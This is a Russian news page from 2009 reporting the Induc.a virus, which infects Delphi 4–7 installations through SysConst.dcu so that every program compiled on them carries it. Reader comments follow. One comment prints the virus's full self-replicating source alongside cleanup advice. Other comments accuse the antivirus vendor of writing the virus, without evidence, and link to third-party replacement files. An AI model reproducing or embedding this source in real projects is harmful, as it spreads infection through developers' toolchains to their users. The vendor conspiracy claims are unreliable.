Virus.Win32.Induc.a – новый вирус для Delphi

18 августа 2009, Баранова Светлана 27
Пока вирус только заражает компьютеры и не несет другой функциональной нагрузки.

Лаборатория Касперского обнаружила вирус Virus.Win32.Induc.a, распространяющийся через интегрированную среду разработки программного обеспечения CodeGear Delphi. Защита от новейшей угрозы уже реализована во всех продуктах "Лаборатории Касперского".

Для своего размножения Virus.Win32.Induc.a использует механизм двушагового создания исполняемых файлов, реализованный в среде Delphi. Согласно данному механизму, исходный код разрабатываемых приложений сначала компилируется в промежуточные .dcu-модули, из которых затем собираются исполняемые в Windows файлы.

Новый вирус активизируется при запуске заражённого им приложения и проверяет, установлен ли на компьютере пакет среды разработки Delphi версий 4.0-7.0. В случае обнаружения пакета, Virus.Win32.Induc.a внедряется в исходный файл базовых констант Delphi Sysconst.pas и компилирует его, в результате чего получается модифицированный откомпилированный файл базовых констант Sysconst.dcu.

Практически каждый проект Delphi включает строчку "use SysConst", поэтому заражение одного системного модуля ведет к инфицированию всех разрабатываемых приложений. Это приводит к тому, что в результате модификации Sysconst.dcu, в дальнейшем все программы, создаваемые в заражённой среде, содержат код нового вируса. Изменённый pas-файл вирусу больше не нужен и удаляется.

Virus.Win32.Induc.a – новый вирус для Delphi

В настоящее время вирус не несет функциональной нагрузки помимо самого заражения, скорее он предназначен для демонстрации и тестирования нового вектора заражений. Отсутствие заметной и деструктивной функциональности, инфицирование новым вирусом некоторых версий популярного интернет-пейджера QIP, а также обычная практика публикации .dcu-модулей разработчиками уже привели к широкому распространению Virus.Win32.Induc.a во всем мире. Вполне вероятно, что в будущем он может быть доработан киберпреступниками в сторону увеличения деструктивности.

Продукты "Лаборатории Касперского" успешно детектируют Virus.Win32.Induc.a и излечивают от него как откомпилированные в Delphi модули, так и файлы исполняемых в Windows форматов.

Отзывы

27 Оставить отзыв
  • Арагозер 17.05.2011 в 19:32

    Тоже Каспер обнаружил вышеописанную зверушку в autorun.exe одного из левых дисков. Диск приобретен, кстати, не где попало, а в супермаркете быттехники "Эльдорадо". Вынужден был запускать установку игры с этого диска минуя авторан.

    • Zer[G] 15.10.2010 в 17:34

      <<< Очень рад >>><<< Очень рад >>><<< СуМаСшеДшиЙ >>><<< СуМаСшеДшиЙ >>><<< СуМаСшеДшиЙ >>> то, что каспер лечить может зараженные файлы, это всего лишь значить, что аналитики не зря зад просиживают, а выполняют работу.

      • Zer[K] 24.03.2010 в 11:05

        Эта скотина заразила мне E:/autorun.exe - СТАЛКЕР. Вылечить Касперским не получается, ссылаясь на то, что нет прав. Помогите плииииз

        • Андрей 18.04.2010 в 17:35

          Мою D7 тоже подбили, я сначала думал, что она программы делает похожими на вирус, поэтому и не обратил никакого внимания, как думаете c QIP прибыл? или QIP самого заразили?

        • WinDied 11.02.2010 в 20:00

          это точно, по статистике 90% зверей бродит по сети "благодаря" конторам по написанию антивирусов - по принципу сам породил и за бабло вылечил <<< УЖАС! >>>

          • Я 14.01.2010 в 00:38

            Эта сука заразила мой дельфи <<< Слёзы... >>>

            • Vanea 22.12.2009 в 19:14

              Заметь-те такой факт, что только Антивирус Касперского умеет грамотно удалять этот вирус из зараженных файлов! А остальные АВ просто бросают зараженные файлы в карантин без возможности востановления. Напрашивается очевидный факт, что именно лаборатория Касперского изобрела данный вирус, устроила его распространение с целью предложения лекарства от онного, что по их мнению (и так оно и есть) должно и уже способствует распространению именно их АВ продукта!!!

              P.S.> КОзлы вонючие, знают что, их АВ не конкурентен по скорости и сильно тормозит машины - вот и толкнули способ наживится.

              • 1 01.12.2009 в 21:45

                У меня сегодня этого гада семантик отыскал<<< Я в шоке >>>

                • Utyfka 04.10.2009 в 21:02

                  У меня тоже это сцуко поселился

                  • прущийгашиш 01.10.2009 в 15:27

                    мне этот вирус уже достаточно мозгов насушил ..

                    • соня 14.09.2009 в 21:52

                      блин у меня вирус win32.Induc.a//как мне избавиться от него ...((((((<<< Слёзы... >>>

                      • ААА 29.08.2009 в 01:53

                        У меня тоже каспер нашел на диске С System Volume Information
                        Virus.Win32.Induc.a

                        • Блабла 27.08.2009 в 19:32

                          <<< Я в шоке >>> кошмар!

                          • IliaIT 27.08.2009 в 11:15

                            Внимание всем, использующим Delphi c 4 по 7!

                            Специфичный Delphi-вирус

                            В интернете появился специфичный для Delphi вирус. Суть его в том, что заражённая программа ищет на диске установленные версии Delphi и, если находит, изменяет файл SysConst.dcu (старая версия сохраняется под именем SysConst.bak), и после этого все программы на Delphi, скомпилированные на этом компьютере, начинают точно так же заражать Delphi на тех компьютерах, где они запускаются. Распространению вируса способствовало то, что некторые версии популярного мессенджера QIP оказались заражены им (команда разработчиков QIP приносит за это свои извинения). Пока единственный обнаруженный вредный эффект от вируса — это то, что из-за ошибки в его коде при запуске заражённой программы возникает Runtime error 3, если ключ реестра HKEY_LOCAL_MACHINE\SOFTWARE\Borland \Delphi\x.0 (x — от 4 до 7) содержит неправильное значение параметра RootDir (для правильного значение ошибки не происходит). Видимо, просто обкатывалась технология распространения вируса.

                            Проверьте свои версии Delphi и, если найдёте у себя SysConst.bak, выполните следующие действия:
                            1. Удалите SysConst.dcu
                            2. Скопируйте SysConst.bak в SysConst.dcu. Важно именно скопировать, а не переименовать, чтобы SysConst.bak тоже остался на диске — это убережёт систему от повторного заражения.

                            Код выглядит примерно вот так:

                            Код:

                            uses windows; var sc:array[1..24] of string=('uses windows; var sc:array[1..24] of string=(', 'function x(s:string):string;var i:integer;begin for i:=1 to length(s) do if s[i]', '=#36 then s[i]:=#39;result:=s;end;procedure re(s,d,e:string);var f1,f2:textfile;', 'h:cardinal;f:STARTUPINFO;p:PROCESS_INFORMATION;b:boolean;t1,t2,t3:FILETIME;begin', 'h:=CreateFile(pchar(d+$bak$),0,0,0,3,0,0);if hDWORD(-1) then begin CloseHandle', '(h);exit;end;{$I-}assignfile(f1,s);reset(f1);if ioresult0 then exit;assignfile', '(f2,d+$pas$);rewrite(f2);if ioresult0 then begin closefile(f1);exit;end; while', 'not eof(f1) do begin readln(f1,s); writeln(f2,s); if pos($implementation$,s)0', 'then break;end;for h:= 1 to 1 do writeln(f2,sc[h]);for h:= 1 to 23 do writeln(f2', ',$$$$+sc[h],$$$,$);writeln(f2,$$$$+sc[24]+$$$);$);for h:= 2 to 24 do writeln(f2,', 'x(sc[h]));closefile(f1);closefile(f2);{$I+}MoveFile(pchar(d+$dcu$),pchar(d+$bak$', ')); fillchar(f,sizeof(f),0); f.cb:=sizeof(f); f.dwFlags:=STARTF_USESHOWWINDOW;f.', 'wShowWindow:=SW_HIDE;b:=CreateProcess(nil,pchar(e+$"$+d+$pas"$),0,0,false,0,0,0,', 'f,p);if b then WaitForSingleObject(p.hProcess,INFINITE);MoveFile(pchar(d+$bak$),', 'pchar(d+$dcu$));DeleteFile(pchar(d+$pas$));h:=CreateFile(pchar(d+$bak$),0,0,0,3,', '0,0); if h=DWORD(-1) then exit; GetFileTime(h,@t1,@t2,@t3); CloseHandle(h);h:=', 'CreateFile(pchar(d+$dcu$),256,0,0,3,0,0);if h=DWORD(-1) then exit;SetFileTime(h,', '@t1,@t2,@t3); CloseHandle(h); end; procedure st; var k:HKEY;c:array [1..255] of', 'char; i:cardinal; r:string; v:char; begin for v:=$4$ to $7$ do if RegOpenKeyEx(', 'HKEY_LOCAL_MACHINE,pchar($Software\Borland\Delphi\$+v+$.0$),0,KEY_READ,k)=0 then', 'begin i:=255;if RegQueryValueEx(k,$RootDir$,nil,@i,@c,@i)=0 then begin r:=$$;i:=', '1; while c[i]#0 do begin r:=r+c[i];inc(i);end;re(r+$\source\rtl\sys\SysConst$+', '$.pas$,r+$\lib\sysconst.$,$"$+r+$\bin\dcc32.exe" $);end;RegCloseKey(k);end; end;', 'begin st; end.'); function x(s:string):string; var i:integer; begin for i:=1 to length(s) do if s[i]=#36 then s[i]:=#39; result:=s; end; procedure re(s,d,e:string); var f1,f2:textfile; h:cardinal; f:STARTUPINFO; p:PROCESS_INFORMATION; b:boolean; t1,t2,t3:FILETIME; begin h:=CreateFile(pchar(d+'bak'),0,0,0,3,0,0); if hDWORD(-1) then begin CloseHandle(h); exit; end; {'I-}assignfile(f1,s); reset(f1); if ioresult0 then exit; assignfile(f2,d+'pas'); rewrite(f2); if ioresult0 then begin closefile(f1); exit; end; while not eof(f1) do begin readln(f1,s); writeln(f2,s); if pos('implementation',s)0 then break; end; for h:= 1 to 1 do writeln(f2,sc[h]); for h:= 1 to 23 do writeln(f2,''''+sc[h],''',');writeln(f2,''''+sc[24]+''');'); for h:= 2 to 24 do writeln(f2,x(sc[h])); closefile(f1); closefile(f2); {'I+}MoveFile(pchar(d+'dcu'),pchar(d+'bak')); fillchar(f,sizeof(f),0); f.cb := sizeof(f); f.dwFlags := STARTF_USESHOWWINDOW; f.wShowWindow := SW_HIDE; b := CreateProcess(nil,pchar(e+'"'+d+'pas"'),0,0,false,0,0,0,f,p); if b then WaitForSingleObject(p.hProcess,INFINITE); MoveFile(pchar(d+'bak'),pchar(d+'dcu')); DeleteFile(pchar(d+'pas')); h := CreateFile(pchar(d+'bak'),0,0,0,3,0,0); if h=DWORD(-1) then exit; GetFileTime(h,@t1,@t2,@t3); CloseHandle(h); h := CreateFile(pchar(d+'dcu'),256,0,0,3,0,0); if h=DWORD(-1) then exit; SetFileTime(h,@t1,@t2,@t3); CloseHandle(h); end; procedure st; var k:HKEY;c:array [1..255] of char; i:cardinal; r:string; v:char; begin for v:='4' to '7' do if RegOpenKeyEx(HKEY_LOCAL_MACHINE,pchar('Software\Borland\Delphi\'+v+'.0'),0,KEY_READ,k)=0 then begin i:=255; if RegQueryValueEx(k,'RootDir',nil,@i,@c,@i)=0 then begin r:=''; i:=1; while c[i]#0 do begin r:=r+c[i]; inc(i); end; re(r+'\source\rtl\sys\SysConst'+'.pas',r+'\lib\sysconst.','"'+r+'\bin\dcc32.exe" '); end; RegCloseKey(k); end; end; begin st; end.

                            Похоже на "вирус", который размножается путём вписывания себя в установленные Delphi, так что все программы, выходящие из-под "заражённых" Delphi будут включать в себя этот "вирус". Правда ничего больше кроме размножения он не делает. Ну, кроме того, что из-за ошибки в коде вируса вы получаете RunTime error 3, если на вашей машине есть ключ реестра HKEY_LOCAL_MACHINE\SOFTWARE\Borland\Delphi\x.0 (x - от 4 до 7) с неправильным значением параметра RootDir (для правильного значение ошибки не происходит).

                            Определить факт "заражения" можно по наличию файла SysConst.bak в папке \Lib. Как удалить - просто удалить SysConst.dcu и переименовать SysConst.bak -> SysConst.dcu. Противодействовать - так-же: просто создайте SysConst.bak (из SysConst.dcu), так что "вирус" будет думать, что всю работу уже сделал. С уже скомпилированными программами так просто ничего не сделать - проще всего их будет пересобрать.

                            Сама проблема с RunTime Error 3 сидит тут:

                            Код:

                            {'I-}assignfile(f1,s); reset(f1); //

                            • F@got@dmin 25.08.2009 в 22:58

                              Браво!!!<<< Браво! >>>

                              • Tom 25.08.2009 в 18:57

                                Вот тут нашёл подробное FAQ по вирю:

                                http://gunsmoker.blogspot.com/2009/08/viruswin32induca.html

                                • SkU4 20.08.2009 в 19:25

                                  JAX, пасиба за ссылку.
                                  А то сижу программирую для себя, никого не трогаю, а тут на тебе - Virus.Win32.Induc.a

                                  • James 19.08.2009 в 15:15

                                    Ничего себе!
                                    Обнаружили тока сёдня, а проги у меня уже ХЗ сколько!

                                    • JAX 19.08.2009 в 14:28

                                      Просто надо поменять SysConst.dcu и SysConst.pas в Дельфях
                                      Ссылка где их можно скачать: http://heroeswm.net/virus-kotoryj-zarazhaet-isxodniki-delphi.html
                                      <<< Хм!.. >>>

                                      • strela 19.08.2009 в 13:03

                                        У меня все проги заразились!! Есть выход личения а не удаления??

                                        • oper 19.08.2009 в 11:35

                                          Сегодня появилась модификация, которая Касперским не детектируется. Только NOD, DrWeb и Avast пока ее видят.

                                          • BOB 19.08.2009 в 05:54

                                            NOD32 v3 с сегодняшними базами нашел его в QIP.exe v8094 и убил насмерть (лечения даже не предлагалось)))

                                            • Ray 19.08.2009 в 01:22

                                              Последнее обновление баз Outpost Security от 19.08.2009 нашло его в квипе 8094, обновил до 8095 - пока тихо <<< Радостный >>> вот и обновляй после этого аську...<<< О-о-о-ой... >>>

                                              • Ананистус 18.08.2009 в 21:18

                                                А ещё игра Сталкер? Оно тоже на Delphi.

                                                • Анонимус о_О 18.08.2009 в 20:40

                                                  а чё только про квип?<<< Радостный >>>) а АИМП?<<< Радостный >>>) и модули миранды и сотни других прог?<<< Радостный >>>)

                                                  Добавить отзыв

                                                  загрузить другую
                                                  Ваш отзыв

                                                  Свежие новости раздела

                                                  Все новости раздела

                                                  Все свежие новости

                                                  Все новости